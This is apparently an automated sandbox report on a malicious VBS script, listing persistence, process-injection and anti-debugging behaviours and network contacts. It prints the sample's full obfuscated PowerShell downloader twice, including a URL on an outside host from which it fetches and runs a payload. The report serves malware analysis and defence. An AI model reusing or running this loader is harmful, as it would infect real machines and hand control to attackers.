Analysis Overview
SHA256
f2061ea9095fd5505fd3812502961c20f5c32b3452b35450728a9f3e0bdbae4e
Threat Level: Likely malicious
The file f2061ea9095fd5505fd3812502961c20f5c32b3452b35450728a9f3e0bdbae4e.vbs was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Adds policy Run key to start application
Checks computer location settings
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-14 02:08
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-14 02:08
Reported
2024-06-14 02:11
Platform
win10v2004-20240508-en
Max time kernel
147s
Max time network
150s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4556 wrote to memory of 3856 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4556 wrote to memory of 3856 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3856 wrote to memory of 5036 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 3856 wrote to memory of 5036 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f2061ea9095fd5505fd3812502961c20f5c32b3452b35450728a9f3e0bdbae4e.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Signe = 1;$Variabeltypes='ring';Function Filbetegnelse($Wadmels){$Sunsquall=$Wadmels.Length-$Signe;$Untailorlike='Subst'+$Variabeltypes;For( $Anaspalin=7;$Anaspalin -lt $Sunsquall;$Anaspalin+=8){$Gruttende+=$Wadmels.$Untailorlike.Invoke( $Anaspalin, $Signe);}$Gruttende;}function Valgmenighedernes($Manendes){ & ($illegalisation) ($Manendes);}$Gamasoidea=Filbetegnelse ' BabyinMJulekaloMelanchzGrou.dwiSparkpalCreptvilorpinsea Truing/Killock5Lejligh.Sekret,0Forsan, Bundga(Pul,onaWCra stviFolketinProlo,ud TyllefoHencemiw Formods Resume GenbesNSikk,rhT equiva Spystil1Decenni0,nteral.Un,esto0 Minisu;Sme.tep Pa.amanWI.doktri Stereon Sigted6Tavlesv4 notabi;Ostiate SulfofxMetabas6 rotect4Kransst;Rebokes parkgstrDrtrsklv Rrlgn :Sub,oen1Sk leel2Ovarier1 Grynte.Me,oria0Fo budd)Stan se hede skGFlonelleGammeljcCursivekEpicardoRecubat/Fanwort2Unrejec0Genrebe1Recani.0 Adspl.0Cubicit1Sanitor0Var.fys1 M zuza UnpervaFgr.mmatiRet krarForageseTrafi.ofDynamogo WhizzbxOmplace/Monticu1Avlsbru2Enla es1 Villia.Whitten0 Forjag ';$Scirrhus=Filbetegnelse 'SygesikUBr ddensurigt geGovernar iffere- D variAFo.efalg DebatpeMa.ropln Coelint ,ntikv ';$Waxingly=Filbetegnelse 'BagflikhBassangtTeskeretAktio.ipGe,give:egisrut/ bil ag/Bra.ker4Zeuneri6Papolat.Floskle1 Mis,ai8Setdown3 Beskik.Bi.ulfa2Harmoni2Fla,ell2Ensilat. Treeta1hissing5Usan sy/ MellemGGgeblomlGlobulia,ntermidGallo.alTohaandiAnatomoeVandskisSalsalatReboote.Paterepj GoldesaOcul,pavDivulsoaBulletw ';$Forduftede71=Filbetegnelse 'Ndersun> Beastl ';$illegalisation=Filbetegnelse 'Glostsdi ShyesseIndtgtsxMasedem ';$Determinacy='Indiapapir132';$Heteroclital = Filbetegnelse 'SkitsereRokni gc AliyoshProag,ioPhotofl Kle,tom% KrydsoaFlisevgpSnitsa p JewishdLand,seaB.nepsytUnreproaUdskeje% Fi,kes\Blr.rneS,rudgincCompursh M.lleme Modi,in TronadkSkattefeArsenoplM ldirevKe,nespiPinc.gug unportnAkupunki Redninn Unassig margu.eFloodprrWo.derfsPoxycot.afhoertsSkorzonaBakterimHightin Redacto&Unsatir&Partiti StavesveBeseglecHempsarhDemonstoRej ebe ViticultLt,tleb ';Valgmenighedernes (Filbetegnelse 'Tomor,o$FredningEventualOffend oErratasb Dg,insaLividitl L.eadg: PersonATipoldelSemid clKimcheeiSprightgBobbingaSss.nsttGoat,ruiVaud uxole.terlnHemmeli=Trylles(Radialgc Skuffem Mult,cd Frustr L cubra/ Tils,ecForskel Lnst.pp$ St.rneHSpydigseF renootBrem.ereTruthler .efereoLanguedc GazumplPreach iGittknitParticia Devexil Udsti )Udmejsl ');Valgmenighedernes (Filbetegnelse 'Brkjern$Pre.mblgHaandfll TistykoGonorrsbForna naIn estalIndus r: PeriphS Erodera IntercmMerostom.rfrieweAlderdonAzoficatBrandflrSystylonJordfstgRopelaynMcadam,isway,ulnVoltit.g UnbruteAl uderr Infini2Tilhold4.ortsta0Reh.ars=Vendue $BeregniWNoninc aPortionxRikardsi WeddednBu banegclawkphlTwan edyBrnevre.CoagitasDmpendep HyperdlBanuseliPl,vskrtThirtyp(Formueo$QuizsmoFkaffessoAutori rRefer idLampmanuCont,mafPar eretJordlageStandpadP lariseSy boli7Patter 1M,neant)Skubspy ');$Waxingly=$Sammentrngninger240[0];$Civilness= (Filbetegnelse 'Neakesm$Meallesg Chat ll Forl.goIsopetabHy.omoraOsteostlLaanets:NattevaINaboerslAnneroddEnecellsUnmedialBoothagu Ri gvrkTeknonyn tigmatiUnfo benEkspansgIni.uitsR,imunda.everanpBra.dhjpLatiniaaTallagervddendeaAbstinet RegioneNulletst I tercsBu.lies=Oprej,nNM mickeeTusindewRallyet-handelsOU evgelb UnflesjvemodigeCord,tecReveriftNeumann UnbendSSomniloyForken.sDidaktitBlondineHaandfumMilie,p. DobbelNKantte,eSaloonetSlilydi.TrademyW Bank,pe Ynke sbBengtenCAxonicdl utterei Poperie AmputenP eonast');$Civilness+=$Alligation[1];Valgmenighedernes ($Civilness);Valgmenighedernes (Filbetegnelse 'Unpriva$MontgolIShlumpslSingle,dUdlic,tsEdmaszel Gr tinuun,oodfkPragmatnKalced.iPapercunNona.sogBrostensDannebraI.trigepKarnevapQuantisa .ktieur D filaaTeks,edtSk tteae Internt traales Papaen.Snder,eHne,hinie Trans aTabtypedFo.mingeRoachlirAuto.obsandroph[Oplg.in$TllingeSsvrms hcEk portiUnderclrDagsprirFlejnskhTra.situSlaskedsFiskesk]Dampkog=Lam,yma$AdenytaGT.icopha.ontingm rytte.a UdvalgsAllerhjoDirtiediKbstderdStringheSt,eameaSlgtled ');$Quittances=Filbetegnelse 'Exc mmu$ lausenIGnaversltambacsd SprogssEricophlDr.lageuT.bulark Abjuncn,rooneriClubablnekspresgUntimorsB,ookliaAl,alimpUrticatpInddataaReskomprSmaavasaSkalottt Saarske Polarit TamtamsYderlig.LumredeDBrownmooAppare.wKateternAfterpilPickeltoSparttiaArseniodPalaeoeFSupersoiSoamuntl esponseMadopsk( Tennis$ attigfWAfsi,diaEc.asitxBleskudiFeltflanRecirclgSull,abl Evako.y Tropho,Conjuga$P,ioritTNode laoafregneeDeliriejCrenothllammergeMi lion)Udkastn ';$Toejle=$Alligation[0];Valgmenighedernes (Filbetegnelse 'Succurs$.epskong inealelBokseboo MastmabGliadinaJannichl .kumme:Energ bAKejtedea S.ltegn rintpddeburghsPersonraErhvervrD agemoiTungstesUncapertSu,eredo ChoanokKunstudrDatabasa Easuret sdvanliStyrtdye GendrirAs.urgenChartereFormn.n=Trichot(uricoleTSedentaePyrewins LnovertSanglrk-HrmyredPBoksehaaGruppeat PreiothOphiob Creamc$UnlawmiTSabbyunoSuperc eGa,lamijbarratrlHan,skee Lvspri) Data,e ');while (!$Aandsaristokratierne) {Valgmenighedernes (Filbetegnelse 'Semipro$Ey opengHoodooblSkuboppo PaagribSki,bruaApartadlre eren:Hjlpev.rSalthoro PhantovSgnehelfGaloisfiUmbraensNonf sskOpryknieEbbingundecolors Sutteg=Gtemnds$myc.soztstillinr,nadipsuBarrelfe erhver ') ;Valgmenighedernes $Quittances;Valgmenighedernes (Filbetegnelse 'Abs rbeSperspectPresentaKi,engerKraverstcelebra-ByggeriSHaablstlElmyskre Dichroe O.erflp av,ntg Somme g4 Pla,fo ');Valgmenighedernes (Filbetegnelse 'forldel$Inh lergpr,tochlLabionaoCarburebUnaffliaSmedejeldannels:AcosmisA opklara CottifnUniv.rsdHovedstsFaci ita Rasherrwoo.ieriTricotpsDenicottImpervioelektrok TribelrGrevskaaLyseslutVermlaniStedtileKurdishrLa.ellunAdmiraleKiselsy=Heweudl(FourierTJeo.ordeFrekvensAnnlilstPlsebrd-FrdselsPSalgsseaLinguant Or,sgnhPers.nk Gennemh$SvornefTPutredio Mispere NotidajRaastofl AcyloxeFot.alb) mprovi ') ;Valgmenighedernes (Filbetegnelse 'Lsrepa $AssistegGalpendlPolerino.uarnerbRetsviraRu kusclOverste:MilksopPAltruissEscargoerollmopuFo.trffdIngenioo,ikronea Skumslnhe hrenarelaunccSlumarbhKvaliterTotalizoHaem,stn,ungmetiAs luslsSl erpatKlorofoifo.boldcS,repor=Voltmet$Sam.enrgSkrsildl martneoRegis.ebDesc ieaUove.enlBortlic:Glam.urR FremryiEkspartcAsylre.kResurresUntolerhNutr tiasem cos+Indkoms+Trespro%Estrich$MinkfarSSulfinea En eromRe setsmSymphoneNedskrinUlrikatt OverburSy svinn Damerkg PipiesnUn.ourniWhich,onStreg,ogProgra,eBordherrAutodyn2 A,ticy4Individ0Cinnamo.uopfyldcslutbe,oBagerisuSkoleelnudkaarit S bles ') ;$Waxingly=$Sammentrngninger240[$Pseudoanachronistic];}$Bifloderne=346851;$Privatundervisningers=30771;Valgmenighedernes (Filbetegnelse 'Koksbla$Ho.gastg PrdikalMos ismo Neda vbRomantiaLineocilAgitate:BitterbtArg,ntiiDowsabemBarakkea sa,dwiu Axi ymaSeemlie Workhov=Tjrenel Aksem gG.ilbageeBall.tatE.fases-Noi,efuCTabernaoArgentin,ordgtit,illemieBarnyv,nZanettetStrbemr graphic$bonitypTunittruo Unho,iePtocholjRygeo,tlTiresomeOpkalds ');Valgmenighedernes (Filbetegnelse ' Chilen$ SelfmagufordrvlPers.ecoGoyi.rvbDil,ttaaEta lerlrv,ulle:Quin,llDf,ooeycaUnsedestEfterfla Rusernb Overdra N,nintn tvnevak InverieLubberlrVoldgifn ForgreePre,ecl Hjkultu=beregni Side.me[Mora.isSzinckenyTribunesSussysttRaanokkeSpildevm blowha.AlliancCRudderhoUn erbynDeba.tevAlst upe,ommetarSk.iftrtBlodpla]fr.mpro:Psychom:MetrumsFdikuirerTrioicooTineweemDechlorBsubterhaPrimegisSupplereEdelwei6F.ttock4RdsptteSSul,hurtSnifferr VilligiDerbyernAnonymigColesee(asympto$Busbanet AmaryliAnischumM triaraSu,rounuGrund raPrototr)Minions ');Valgmenighedernes (Filbetegnelse ' Balakk$S rychng c emosl Guessto FedesvbDe,onstaSkriverl Leache:FiremasSChondran s.enarnGripep,iUnattackp,ramideSlumpssrBo deaunOve,cone larrig Cosmopo=Kuperin Pauseme[Udvlg,lS LandinyAfdampes evlerstYppigerePh,laenmKollegi. DeprogTPeriodee .urmulxAf,rkket Overb,.Crad.ecE GrousenGraf rncSmyrneaofylfotsdRob.tisiForgrunnMi faregEruptiv]Superst:carlish:F seforAAlfastrSI,kerquCsubtetaI Shark,ICraftin.TrappesGUn,appee slagmatNeoteriSPre.edet VonnierTank,gaiDiagnosnCloutingIndslag(Rhe,met$PromagiDConceptaBe.mysutOutjumpaG.cksrebnonpestaFl,ndernmiljbeskSkrigene Sal.onrPrins,sn ServieeHyposta) Platic ');Valgmenighedernes (Filbetegnelse ' K,nsta$ SvejtsgRinginelPrunabloMuskulrbU,produa Myc,lolRepatro:DesultoK Spr.ngbViolaqumleva,tka Ha.rrrnPh,laend Ove ineAdmin snKamgrss=Bugvgbl$FlokinsSUnputr nscruplenRevolutiFileredkChaunopeSt,laiprS umretnPrstindeIndkast. UnderfsPolydynuOpsamlib,hioanvs Kildret Nyttevr Cop odiDonatepnNurserygVi,flas(Acciden$StreptoBOwnnes.iSkattedfC bildol HydrogoDio trydUvilligeKimme,irGapeseenOverrepeSixtens, Se,ail$illegitPToucheerstegefei a.derivShipmenaFagbladtSkat etuSubchelnBelejr d.muletteBeskiknrFreetyevToldgrni BridecsSphenetn Femaari Rets.nnHabenalg DiphtheZinkkogrGradualsRehu.an),lasikk ');Valgmenighedernes $Kbmanden;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Schenkelvigningers.sam && echo t"
Network
| Country | Destination | Domain | Proto |
| LV | 46.183.222.15:80 | tcp | |
| LV | 46.183.222.15:80 | tcp | |
| LV | 46.183.222.15:80 | tcp | |
| LV | 46.183.222.15:80 | tcp | |
| LV | 46.183.222.15:80 | tcp | |
| LV | 46.183.222.15:80 | tcp |
Files
memory/3856-0-0x00007FF85A9B3000-0x00007FF85A9B5000-memory.dmp
memory/3856-1-0x000001A16AF40000-0x000001A16AF62000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sikjojhh.ufd.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3856-11-0x00007FF85A9B0000-0x00007FF85B471000-memory.dmp
memory/3856-12-0x00007FF85A9B0000-0x00007FF85B471000-memory.dmp
memory/3856-13-0x00007FF85A9B0000-0x00007FF85B471000-memory.dmp
memory/3856-14-0x00007FF85A9B0000-0x00007FF85B471000-memory.dmp
memory/3856-15-0x00007FF85A9B0000-0x00007FF85B471000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-14 02:08
Reported
2024-06-14 02:11
Platform
win7-20240611-en
Max time kernel
149s
Max time network
147s
Command Line
Signatures
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Key created | \Registry\User\S-1-5-21-39690363-730359138-1046745555-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Windows\SysWOW64\extrac32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\IZILLDQXRHV = "C:\\Program Files (x86)\\windows mail\\wab.exe" | C:\Windows\SysWOW64\extrac32.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3036 set thread context of 2396 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
| PID 2396 set thread context of 1308 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Windows\Explorer.EXE |
| PID 2396 set thread context of 1044 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Windows\SysWOW64\extrac32.exe |
| PID 1044 set thread context of 1308 | N/A | C:\Windows\SysWOW64\extrac32.exe | C:\Windows\Explorer.EXE |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\extrac32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\extrac32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\extrac32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\extrac32.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\extrac32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\extrac32.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f2061ea9095fd5505fd3812502961c20f5c32b3452b35450728a9f3e0bdbae4e.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Signe = 1;$Variabeltypes='ring';Function Filbetegnelse($Wadmels){$Sunsquall=$Wadmels.Length-$Signe;$Untailorlike='Subst'+$Variabeltypes;For( $Anaspalin=7;$Anaspalin -lt $Sunsquall;$Anaspalin+=8){$Gruttende+=$Wadmels.$Untailorlike.Invoke( $Anaspalin, $Signe);}$Gruttende;}function Valgmenighedernes($Manendes){ & ($illegalisation) ($Manendes);}$Gamasoidea=Filbetegnelse ' BabyinMJulekaloMelanchzGrou.dwiSparkpalCreptvilorpinsea Truing/Killock5Lejligh.Sekret,0Forsan, Bundga(Pul,onaWCra stviFolketinProlo,ud TyllefoHencemiw Formods Resume GenbesNSikk,rhT equiva Spystil1Decenni0,nteral.Un,esto0 Minisu;Sme.tep Pa.amanWI.doktri Stereon Sigted6Tavlesv4 notabi;Ostiate SulfofxMetabas6 rotect4Kransst;Rebokes parkgstrDrtrsklv Rrlgn :Sub,oen1Sk leel2Ovarier1 Grynte.Me,oria0Fo budd)Stan se hede skGFlonelleGammeljcCursivekEpicardoRecubat/Fanwort2Unrejec0Genrebe1Recani.0 Adspl.0Cubicit1Sanitor0Var.fys1 M zuza UnpervaFgr.mmatiRet krarForageseTrafi.ofDynamogo WhizzbxOmplace/Monticu1Avlsbru2Enla es1 Villia.Whitten0 Forjag ';$Scirrhus=Filbetegnelse 'SygesikUBr ddensurigt geGovernar iffere- D variAFo.efalg DebatpeMa.ropln Coelint ,ntikv ';$Waxingly=Filbetegnelse 'BagflikhBassangtTeskeretAktio.ipGe,give:egisrut/ bil ag/Bra.ker4Zeuneri6Papolat.Floskle1 Mis,ai8Setdown3 Beskik.Bi.ulfa2Harmoni2Fla,ell2Ensilat. Treeta1hissing5Usan sy/ MellemGGgeblomlGlobulia,ntermidGallo.alTohaandiAnatomoeVandskisSalsalatReboote.Paterepj GoldesaOcul,pavDivulsoaBulletw ';$Forduftede71=Filbetegnelse 'Ndersun> Beastl ';$illegalisation=Filbetegnelse 'Glostsdi ShyesseIndtgtsxMasedem ';$Determinacy='Indiapapir132';$Heteroclital = Filbetegnelse 'SkitsereRokni gc AliyoshProag,ioPhotofl Kle,tom% KrydsoaFlisevgpSnitsa p JewishdLand,seaB.nepsytUnreproaUdskeje% Fi,kes\Blr.rneS,rudgincCompursh M.lleme Modi,in TronadkSkattefeArsenoplM ldirevKe,nespiPinc.gug unportnAkupunki Redninn Unassig margu.eFloodprrWo.derfsPoxycot.afhoertsSkorzonaBakterimHightin Redacto&Unsatir&Partiti StavesveBeseglecHempsarhDemonstoRej ebe ViticultLt,tleb ';Valgmenighedernes (Filbetegnelse 'Tomor,o$FredningEventualOffend oErratasb Dg,insaLividitl L.eadg: PersonATipoldelSemid clKimcheeiSprightgBobbingaSss.nsttGoat,ruiVaud uxole.terlnHemmeli=Trylles(Radialgc Skuffem Mult,cd Frustr L cubra/ Tils,ecForskel Lnst.pp$ St.rneHSpydigseF renootBrem.ereTruthler .efereoLanguedc GazumplPreach iGittknitParticia Devexil Udsti )Udmejsl ');Valgmenighedernes (Filbetegnelse 'Brkjern$Pre.mblgHaandfll TistykoGonorrsbForna naIn estalIndus r: PeriphS Erodera IntercmMerostom.rfrieweAlderdonAzoficatBrandflrSystylonJordfstgRopelaynMcadam,isway,ulnVoltit.g UnbruteAl uderr Infini2Tilhold4.ortsta0Reh.ars=Vendue $BeregniWNoninc aPortionxRikardsi WeddednBu banegclawkphlTwan edyBrnevre.CoagitasDmpendep HyperdlBanuseliPl,vskrtThirtyp(Formueo$QuizsmoFkaffessoAutori rRefer idLampmanuCont,mafPar eretJordlageStandpadP lariseSy boli7Patter 1M,neant)Skubspy ');$Waxingly=$Sammentrngninger240[0];$Civilness= (Filbetegnelse 'Neakesm$Meallesg Chat ll Forl.goIsopetabHy.omoraOsteostlLaanets:NattevaINaboerslAnneroddEnecellsUnmedialBoothagu Ri gvrkTeknonyn tigmatiUnfo benEkspansgIni.uitsR,imunda.everanpBra.dhjpLatiniaaTallagervddendeaAbstinet RegioneNulletst I tercsBu.lies=Oprej,nNM mickeeTusindewRallyet-handelsOU evgelb UnflesjvemodigeCord,tecReveriftNeumann UnbendSSomniloyForken.sDidaktitBlondineHaandfumMilie,p. DobbelNKantte,eSaloonetSlilydi.TrademyW Bank,pe Ynke sbBengtenCAxonicdl utterei Poperie AmputenP eonast');$Civilness+=$Alligation[1];Valgmenighedernes ($Civilness);Valgmenighedernes (Filbetegnelse 'Unpriva$MontgolIShlumpslSingle,dUdlic,tsEdmaszel Gr tinuun,oodfkPragmatnKalced.iPapercunNona.sogBrostensDannebraI.trigepKarnevapQuantisa .ktieur D filaaTeks,edtSk tteae Internt traales Papaen.Snder,eHne,hinie Trans aTabtypedFo.mingeRoachlirAuto.obsandroph[Oplg.in$TllingeSsvrms hcEk portiUnderclrDagsprirFlejnskhTra.situSlaskedsFiskesk]Dampkog=Lam,yma$AdenytaGT.icopha.ontingm rytte.a UdvalgsAllerhjoDirtiediKbstderdStringheSt,eameaSlgtled ');$Quittances=Filbetegnelse 'Exc mmu$ lausenIGnaversltambacsd SprogssEricophlDr.lageuT.bulark Abjuncn,rooneriClubablnekspresgUntimorsB,ookliaAl,alimpUrticatpInddataaReskomprSmaavasaSkalottt Saarske Polarit TamtamsYderlig.LumredeDBrownmooAppare.wKateternAfterpilPickeltoSparttiaArseniodPalaeoeFSupersoiSoamuntl esponseMadopsk( Tennis$ attigfWAfsi,diaEc.asitxBleskudiFeltflanRecirclgSull,abl Evako.y Tropho,Conjuga$P,ioritTNode laoafregneeDeliriejCrenothllammergeMi lion)Udkastn ';$Toejle=$Alligation[0];Valgmenighedernes (Filbetegnelse 'Succurs$.epskong inealelBokseboo MastmabGliadinaJannichl .kumme:Energ bAKejtedea S.ltegn rintpddeburghsPersonraErhvervrD agemoiTungstesUncapertSu,eredo ChoanokKunstudrDatabasa Easuret sdvanliStyrtdye GendrirAs.urgenChartereFormn.n=Trichot(uricoleTSedentaePyrewins LnovertSanglrk-HrmyredPBoksehaaGruppeat PreiothOphiob Creamc$UnlawmiTSabbyunoSuperc eGa,lamijbarratrlHan,skee Lvspri) Data,e ');while (!$Aandsaristokratierne) {Valgmenighedernes (Filbetegnelse 'Semipro$Ey opengHoodooblSkuboppo PaagribSki,bruaApartadlre eren:Hjlpev.rSalthoro PhantovSgnehelfGaloisfiUmbraensNonf sskOpryknieEbbingundecolors Sutteg=Gtemnds$myc.soztstillinr,nadipsuBarrelfe erhver ') ;Valgmenighedernes $Quittances;Valgmenighedernes (Filbetegnelse 'Abs rbeSperspectPresentaKi,engerKraverstcelebra-ByggeriSHaablstlElmyskre Dichroe O.erflp av,ntg Somme g4 Pla,fo ');Valgmenighedernes (Filbetegnelse 'forldel$Inh lergpr,tochlLabionaoCarburebUnaffliaSmedejeldannels:AcosmisA opklara CottifnUniv.rsdHovedstsFaci ita Rasherrwoo.ieriTricotpsDenicottImpervioelektrok TribelrGrevskaaLyseslutVermlaniStedtileKurdishrLa.ellunAdmiraleKiselsy=Heweudl(FourierTJeo.ordeFrekvensAnnlilstPlsebrd-FrdselsPSalgsseaLinguant Or,sgnhPers.nk Gennemh$SvornefTPutredio Mispere NotidajRaastofl AcyloxeFot.alb) mprovi ') ;Valgmenighedernes (Filbetegnelse 'Lsrepa $AssistegGalpendlPolerino.uarnerbRetsviraRu kusclOverste:MilksopPAltruissEscargoerollmopuFo.trffdIngenioo,ikronea Skumslnhe hrenarelaunccSlumarbhKvaliterTotalizoHaem,stn,ungmetiAs luslsSl erpatKlorofoifo.boldcS,repor=Voltmet$Sam.enrgSkrsildl martneoRegis.ebDesc ieaUove.enlBortlic:Glam.urR FremryiEkspartcAsylre.kResurresUntolerhNutr tiasem cos+Indkoms+Trespro%Estrich$MinkfarSSulfinea En eromRe setsmSymphoneNedskrinUlrikatt OverburSy svinn Damerkg PipiesnUn.ourniWhich,onStreg,ogProgra,eBordherrAutodyn2 A,ticy4Individ0Cinnamo.uopfyldcslutbe,oBagerisuSkoleelnudkaarit S bles ') ;$Waxingly=$Sammentrngninger240[$Pseudoanachronistic];}$Bifloderne=346851;$Privatundervisningers=30771;Valgmenighedernes (Filbetegnelse 'Koksbla$Ho.gastg PrdikalMos ismo Neda vbRomantiaLineocilAgitate:BitterbtArg,ntiiDowsabemBarakkea sa,dwiu Axi ymaSeemlie Workhov=Tjrenel Aksem gG.ilbageeBall.tatE.fases-Noi,efuCTabernaoArgentin,ordgtit,illemieBarnyv,nZanettetStrbemr graphic$bonitypTunittruo Unho,iePtocholjRygeo,tlTiresomeOpkalds ');Valgmenighedernes (Filbetegnelse ' Chilen$ SelfmagufordrvlPers.ecoGoyi.rvbDil,ttaaEta lerlrv,ulle:Quin,llDf,ooeycaUnsedestEfterfla Rusernb Overdra N,nintn tvnevak InverieLubberlrVoldgifn ForgreePre,ecl Hjkultu=beregni Side.me[Mora.isSzinckenyTribunesSussysttRaanokkeSpildevm blowha.AlliancCRudderhoUn erbynDeba.tevAlst upe,ommetarSk.iftrtBlodpla]fr.mpro:Psychom:MetrumsFdikuirerTrioicooTineweemDechlorBsubterhaPrimegisSupplereEdelwei6F.ttock4RdsptteSSul,hurtSnifferr VilligiDerbyernAnonymigColesee(asympto$Busbanet AmaryliAnischumM triaraSu,rounuGrund raPrototr)Minions ');Valgmenighedernes (Filbetegnelse ' Balakk$S rychng c emosl Guessto FedesvbDe,onstaSkriverl Leache:FiremasSChondran s.enarnGripep,iUnattackp,ramideSlumpssrBo deaunOve,cone larrig Cosmopo=Kuperin Pauseme[Udvlg,lS LandinyAfdampes evlerstYppigerePh,laenmKollegi. DeprogTPeriodee .urmulxAf,rkket Overb,.Crad.ecE GrousenGraf 